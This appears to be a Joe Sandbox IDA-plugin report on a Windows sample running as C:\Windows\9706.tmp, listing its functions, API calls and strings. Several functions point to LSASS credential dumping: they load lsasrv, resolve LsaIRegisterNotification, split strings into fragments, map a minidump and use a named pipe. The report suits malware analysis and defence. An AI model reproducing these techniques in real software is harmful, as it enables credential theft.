Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01304E13, Relevance: 1.6, APIs: 1, Instructions: 54

APIs

Part of subcall function 0130715E: EncodePointer.KERNEL32(F4A3BED3,?,?,01304E3F), ref: 0130716A

__initterm_e.LIBCMT ref: 01304E49

Part of subcall function 01307220: __FindPESection.LIBCMT ref: 0130727B

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01307A32, Relevance: 1.6, APIs: 1, Instructions: 52

APIs

RtlAllocateHeap.NTDLL(00000008,01303889,00000000,?,0130626F,?,01303889,00000000,00000000,00000000,?,01304776,00000001,00000214,?,?), ref: 01307A75

Part of subcall function 01306FFC: DecodePointer.KERNEL32(?,01307A8E,01303889,00000000,?,0130626F,?,01303889,00000000,00000000,00000000,?,01304776,00000001,00000214), ref: 01307007

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 013070DA, Relevance: 1.5, APIs: 1, Instructions: 22

APIs

Part of subcall function 01306259: Sleep.KERNEL32(00000000,01303889,?,?,?), ref: 01306281

EncodePointer.KERNEL32(00000000), ref: 013070EB

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 0130715E, Relevance: 1.5, APIs: 1, Instructions: 13

APIs

EncodePointer.KERNEL32(F4A3BED3,?,?,01304E3F), ref: 0130716A

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01305973, Relevance: 1.5, APIs: 1, Instructions: 10

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,01303AFB,01309D28,00000014), ref: 0130597C

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01304D92, Relevance: 1.5, APIs: 1, Instructions: 8

APIs

Part of subcall function 01304D67: GetModuleHandleW.KERNEL32(mscoree.dll,?,01304D9F,?,?,0130789B,000000FF,0000001E,00000001,00000000,00000000,?,01306225,?,00000001,?), ref: 01304D71
Part of subcall function 01304D67: GetProcAddress.KERNEL32(00000000,CorExitProcess,?,01304D9F,?,?,0130789B,000000FF,0000001E,00000001,00000000,00000000,?,01306225,?,00000001), ref: 01304D81

ExitProcess.KERNEL32 ref: 01304DA3

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01306DB9, Relevance: 1.5, APIs: 1, Instructions: 4

APIs

EncodePointer.KERNEL32(Function_00006D80,01304DEA,00000000,00000000,00000000,00000000,00000000,00000000,757DF933,013049D8,?,01303B0C,01309D28,00000014), ref: 01306DBE

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01304614, Relevance: 1.5, APIs: 1, Instructions: 3

APIs

EncodePointer.KERNEL32(00000000,01307302,0130C038,00000314,00000000,?,?,?,?,?,013051B5,0130C038,Microsoft Visual C++ Runtime Library,00012010), ref: 01304616

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01306259, Relevance: 1.3, APIs: 1, Instructions: 30

APIs

Part of subcall function 01307A32: RtlAllocateHeap.NTDLL(00000008,01303889,00000000,?,0130626F,?,01303889,00000000,00000000,00000000,?,01304776,00000001,00000214,?,?), ref: 01307A75

Sleep.KERNEL32(00000000,01303889,?,?,?), ref: 01306281

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01301C6D, Relevance: 1.3, APIs: 1, Instructions: 21

APIs

Part of subcall function 01301DE0: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018,?,?,00000000), ref: 01301E50
Part of subcall function 01301DE0: GetProcAddress.KERNEL32(00000000), ref: 01301E59
Part of subcall function 01301DE0: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000109), ref: 01301E9D
Part of subcall function 01301DE0: GetProcAddress.KERNEL32(00000000), ref: 01301EA0
Part of subcall function 01301DE0: LocalFree.KERNEL32(?), ref: 01301ED8
Part of subcall function 01301DE0: LocalFree.KERNEL32(?), ref: 01301EDD

LocalFree.KERNEL32(?,?,?,?,01301C46), ref: 01301C8C

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Non-executed Functions

Function 013072DC, Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 134

APIs

Part of subcall function 01304614: EncodePointer.KERNEL32(00000000,01307302,0130C038,00000314,00000000,?,?,?,?,?,013051B5,0130C038,Microsoft Visual C++ Runtime Library,00012010), ref: 01304616

LoadLibraryW.KERNEL32(USER32.DLL), ref: 01307317
GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 01307333
EncodePointer.KERNEL32(00000000), ref: 01307344
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 01307351
EncodePointer.KERNEL32(00000000), ref: 01307354
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 01307361
EncodePointer.KERNEL32(00000000), ref: 01307364
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 01307371
EncodePointer.KERNEL32(00000000), ref: 01307374
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 01307385
EncodePointer.KERNEL32(00000000), ref: 01307388
DecodePointer.KERNEL32(00000000,0130C038,00000314,00000000), ref: 013073AA
DecodePointer.KERNEL32 ref: 013073B4
DecodePointer.KERNEL32(?,0130C038,00000314,00000000), ref: 013073F3
DecodePointer.KERNEL32(?), ref: 0130740D
DecodePointer.KERNEL32(0130C038,00000314,00000000), ref: 01307421

Part of subcall function 0130601E: IsDebuggerPresent.KERNEL32 ref: 013079E7
Part of subcall function 0130601E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 013079FC
Part of subcall function 0130601E: UnhandledExceptionFilter.KERNEL32(013098DC), ref: 01307A07
Part of subcall function 0130601E: GetCurrentProcess.KERNEL32(C0000409), ref: 01307A23
Part of subcall function 0130601E: TerminateProcess.KERNEL32(00000000), ref: 01307A2A

Strings

GetLastActivePopup, xrefs: 01307356
GetActiveWindow, xrefs: 01307346
MessageBoxW, xrefs: 0130732D
GetUserObjectInformationW, xrefs: 01307366
USER32.DLL, xrefs: 01307312
GetProcessWindowStation, xrefs: 0130737F

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01302130, Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 202

APIs

GetModuleHandleW.KERNEL32(kernel32,LoadLibraryW,lsasrv), ref: 0130217F
GetProcAddress.KERNEL32(00000000), ref: 01302186

Part of subcall function 01301CE8: RtlInitUnicodeString.NTDLL(?,?), ref: 01301D08

GetProcAddress.KERNEL32 ref: 01302282
GetProcAddress.KERNEL32(LsaIRegisterNotification), ref: 01302297

Part of subcall function 013012C3: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 01301370
Part of subcall function 013012C3: GetProcAddress.KERNEL32(00000000), ref: 01301377
Part of subcall function 013012C3: LocalAlloc.KERNELBASE ref: 0130137D
Part of subcall function 013012C3: LocalFree.KERNEL32(?), ref: 013013C4

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000100), ref: 013023A5
GetProcAddress.KERNEL32(00000000), ref: 013023A8
GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000090), ref: 013023C1
GetProcAddress.KERNEL32(00000000), ref: 013023C4

Strings

LocalAlloc, xrefs: 01302398, 013023B9
LoadLibraryW, xrefs: 01302175
lsasrv, xrefs: 01302170
on, xrefs: 01302276
LsaIRegisterNotification, xrefs: 0130228C
kernel32, xrefs: 0130217A, 0130239D, 013023A2, 013023BE
elNo, xrefs: 0130225E
Canc, xrefs: 01302256
LsaI, xrefs: 0130224E
tifi, xrefs: 01302266
cati, xrefs: 0130226E

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01301FD9, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 74

APIs

GetProcessHeap.KERNEL32 ref: 01302000
HeapAlloc.KERNEL32(00000000), ref: 01302007
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0130201C
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 0130202E
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 01302052
GetModuleHandleW.KERNEL32(kernel32,GetLastError), ref: 01302069
GetProcAddress.KERNEL32(00000000), ref: 01302070
Sleep.KERNEL32(00000BB8), ref: 01302080
WaitNamedPipeW.KERNEL32(?,00000BB8), ref: 0130208C

Strings

GetLastError, xrefs: 0130205F
kernel32, xrefs: 01302064

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01305078, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 148

APIs

GetModuleFileNameW.KERNEL32(00000000,0130C06A,00000104,00000001,00000000,?), ref: 01305114

Part of subcall function 01304C60: GetCurrentProcess.KERNEL32(C0000417,01303889,?,?,?), ref: 01304C76
Part of subcall function 01304C60: TerminateProcess.KERNEL32(00000000), ref: 01304C7D

_wcslen.LIBCMT ref: 01305143
_wcslen.LIBCMT ref: 01305150

Part of subcall function 013072DC: LoadLibraryW.KERNEL32(USER32.DLL), ref: 01307317
Part of subcall function 013072DC: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 01307333
Part of subcall function 013072DC: EncodePointer.KERNEL32(00000000), ref: 01307344
Part of subcall function 013072DC: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 01307351
Part of subcall function 013072DC: EncodePointer.KERNEL32(00000000), ref: 01307354
Part of subcall function 013072DC: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 01307361
Part of subcall function 013072DC: EncodePointer.KERNEL32(00000000), ref: 01307364
Part of subcall function 013072DC: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 01307371
Part of subcall function 013072DC: EncodePointer.KERNEL32(00000000), ref: 01307374
Part of subcall function 013072DC: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 01307385
Part of subcall function 013072DC: EncodePointer.KERNEL32(00000000), ref: 01307388
Part of subcall function 013072DC: DecodePointer.KERNEL32(00000000,0130C038,00000314,00000000), ref: 013073AA
Part of subcall function 013072DC: DecodePointer.KERNEL32 ref: 013073B4
Part of subcall function 013072DC: DecodePointer.KERNEL32(?,0130C038,00000314,00000000), ref: 013073F3
Part of subcall function 013072DC: DecodePointer.KERNEL32(?), ref: 0130740D
Part of subcall function 013072DC: DecodePointer.KERNEL32(0130C038,00000314,00000000), ref: 01307421

GetStdHandle.KERNEL32(000000F4,00000001,00000000,?), ref: 013051C6
_strlen.LIBCMT ref: 01305203
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 01305212

Part of subcall function 0130601E: IsDebuggerPresent.KERNEL32 ref: 013079E7
Part of subcall function 0130601E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 013079FC
Part of subcall function 0130601E: UnhandledExceptionFilter.KERNEL32(013098DC), ref: 01307A07
Part of subcall function 0130601E: GetCurrentProcess.KERNEL32(C0000409), ref: 01307A23
Part of subcall function 0130601E: TerminateProcess.KERNEL32(00000000), ref: 01307A2A

Strings

<program name unknown>, xrefs: 01305123
..., xrefs: 01305164
Runtime Error!Program: , xrefs: 013050E2
Microsoft Visual C++ Runtime Library, xrefs: 013051AA

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01301000, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80

APIs

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000008,00000001,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 0130101D
GetProcAddress.KERNEL32(00000000,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 01301026
GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000004,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 01301059
GetProcAddress.KERNEL32(00000000,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 0130105C
GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000004,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 01301088
GetProcAddress.KERNEL32(00000000,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 0130108B

Part of subcall function 013013FC: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000008,0130CD68,013010A6,01302D60,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 0130140D
Part of subcall function 013013FC: GetProcAddress.KERNEL32(00000000,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 01301414
Part of subcall function 013013FC: CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 0130142C
Part of subcall function 013013FC: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 01301443

LocalFree.KERNEL32(0130CD68,?,00000000,?,01302D60,00000001,00000000), ref: 013010BE

Strings

LocalAlloc, xrefs: 01301012, 01301053, 01301082
kernel32, xrefs: 01301017, 0130101C, 01301058, 01301087

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01305CCA, Relevance: 15.2, APIs: 10, Instructions: 190

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,?,?,?,00000000), ref: 01305D3B
__alloca_probe_16.NTDLLP ref: 01305D66
MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,00000000,?,00000000,?,?,?,?,?,00000000), ref: 01305DA9
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000), ref: 01305DC5
LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,?,?,00000000), ref: 01305DFE
__alloca_probe_16.NTDLLP ref: 01305E20

Part of subcall function 0130786C: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,01306225,?,00000001,?,?,01306132,00000018,01309E18,0000000C,013061C2), ref: 013078B1

LCMapStringW.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,?,?,?,?,00000000), ref: 01305E64
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000), ref: 01305E83
__freea.LIBCMT ref: 01305E8D
__freea.LIBCMT ref: 01305E96

Part of subcall function 0130601E: IsDebuggerPresent.KERNEL32 ref: 013079E7
Part of subcall function 0130601E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 013079FC
Part of subcall function 0130601E: UnhandledExceptionFilter.KERNEL32(013098DC), ref: 01307A07
Part of subcall function 0130601E: GetCurrentProcess.KERNEL32(C0000409), ref: 01307A23
Part of subcall function 0130601E: TerminateProcess.KERNEL32(00000000), ref: 01307A2A

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 013013FC, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 49

APIs

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000008,0130CD68,013010A6,01302D60,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 0130140D
GetProcAddress.KERNEL32(00000000,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 01301414
CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 0130142C
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01302D60,00000001,00000000,?,0130CD30,00000000), ref: 01301443

Part of subcall function 01301478: UnmapViewOfFile.KERNEL32(00000002,00458328,01301100,?,01302ED2,?,0130CD30,00000000), ref: 01301483
Part of subcall function 01301478: CloseHandle.KERNEL32(?), ref: 01301490

Strings

LocalAlloc, xrefs: 01301401
kernel32, xrefs: 01301406
MDMP, xrefs: 01301457

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 0130436A, Relevance: 12.1, APIs: 8, Instructions: 61

APIs

InterlockedDecrement.KERNEL32(?), ref: 01304384
InterlockedDecrement.KERNEL32(?), ref: 01304391
InterlockedDecrement.KERNEL32(?), ref: 0130439E
InterlockedDecrement.KERNEL32(?), ref: 013043AB
InterlockedDecrement.KERNEL32(?), ref: 013043B8
InterlockedDecrement.KERNEL32(?), ref: 013043D4
InterlockedDecrement.KERNEL32(FC45C7E4), ref: 013043E4
InterlockedDecrement.KERNEL32(?), ref: 013043FA

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 013042DB, Relevance: 12.1, APIs: 8, Instructions: 58

APIs

InterlockedIncrement.KERNEL32(?), ref: 013042ED
InterlockedIncrement.KERNEL32(?), ref: 013042FA
InterlockedIncrement.KERNEL32(?), ref: 01304307
InterlockedIncrement.KERNEL32(?), ref: 01304314
InterlockedIncrement.KERNEL32(?), ref: 01304321
InterlockedIncrement.KERNEL32(?), ref: 0130433D
InterlockedIncrement.KERNEL32(00000000), ref: 0130434D
InterlockedIncrement.KERNEL32(?), ref: 01304363

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01304123, Relevance: 7.6, APIs: 5, Instructions: 116

APIs

__getptd.LIBCMT ref: 01304133

Part of subcall function 013047C4: __amsg_exit.LIBCMT ref: 013047D4

Part of subcall function 01303E1A: __getptd.LIBCMT ref: 01303E26
Part of subcall function 01303E1A: __amsg_exit.LIBCMT ref: 01303E46
Part of subcall function 01303E1A: InterlockedDecrement.KERNEL32(?), ref: 01303E73
Part of subcall function 01303E1A: InterlockedIncrement.KERNEL32(001E11F8), ref: 01303E9E

Part of subcall function 01303EBE: GetOEMCP.KERNEL32(00000000), ref: 01303EE7
Part of subcall function 01303EBE: GetACP.KERNEL32(00000000), ref: 01303F0A

Part of subcall function 01306214: Sleep.KERNEL32(00000000,00000001,?,?,01306132,00000018,01309E18,0000000C,013061C2,?,?,?,013046E1,0000000D), ref: 01306235

Part of subcall function 01303F3A: setSBCS.LIBCMT ref: 01303F67
Part of subcall function 01303F3A: IsValidCodePage.KERNEL32(-00000030), ref: 01303FAD
Part of subcall function 01303F3A: GetCPInfo.KERNEL32(00000000,?), ref: 01303FC0
Part of subcall function 01303F3A: setSBUpLow.LIBCMT ref: 013040AE

InterlockedDecrement.KERNEL32(?), ref: 01304199
InterlockedIncrement.KERNEL32(00000000), ref: 013041BE

Part of subcall function 013061A7: __amsg_exit.LIBCMT ref: 013061C9
Part of subcall function 013061A7: EnterCriticalSection.KERNEL32(?,?,?,013046E1,0000000D), ref: 013061D1

InterlockedDecrement.KERNEL32 ref: 01304250
InterlockedIncrement.KERNEL32(00000000), ref: 01304274

Part of subcall function 013061DA: HeapFree.KERNEL32(00000000,00000000), ref: 013061F0
Part of subcall function 013061DA: GetLastError.KERNEL32(00000000,?,013047B5,00000000,?,?,013047CC,?,01303806,?,?,01303889), ref: 01306202

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01305EF7, Relevance: 7.6, APIs: 5, Instructions: 92

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000100,?,?,?,?,?,0130600C,?,00000000,?), ref: 01305F41
__alloca_probe_16.NTDLLP ref: 01305F62

Part of subcall function 0130786C: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,01306225,?,00000001,?,?,01306132,00000018,01309E18,0000000C,013061C2), ref: 013078B1

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 01305FAB
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 01305FB9
__freea.LIBCMT ref: 01305FC3

Part of subcall function 0130601E: IsDebuggerPresent.KERNEL32 ref: 013079E7
Part of subcall function 0130601E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 013079FC
Part of subcall function 0130601E: UnhandledExceptionFilter.KERNEL32(013098DC), ref: 01307A07
Part of subcall function 0130601E: GetCurrentProcess.KERNEL32(C0000409), ref: 01307A23
Part of subcall function 0130601E: TerminateProcess.KERNEL32(00000000), ref: 01307A2A

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01305B8F, Relevance: 7.6, APIs: 5, Instructions: 54

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01305BC6
GetCurrentProcessId.KERNEL32 ref: 01305BD2
GetCurrentThreadId.KERNEL32 ref: 01305BDA
GetTickCount.KERNEL32 ref: 01305BE2
QueryPerformanceCounter.KERNEL32(?), ref: 01305BEE

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 013055DC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Windows\9706.tmp,00000104), ref: 013055FC
_wparse_cmdline.LIBCMT ref: 01305626

Part of subcall function 01306214: Sleep.KERNEL32(00000000,00000001,?,?,01306132,00000018,01309E18,0000000C,013061C2,?,?,?,013046E1,0000000D), ref: 01306235

_wparse_cmdline.LIBCMT ref: 01305668

Strings

C:\Windows\9706.tmp, xrefs: 013055EB, 013055F0

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

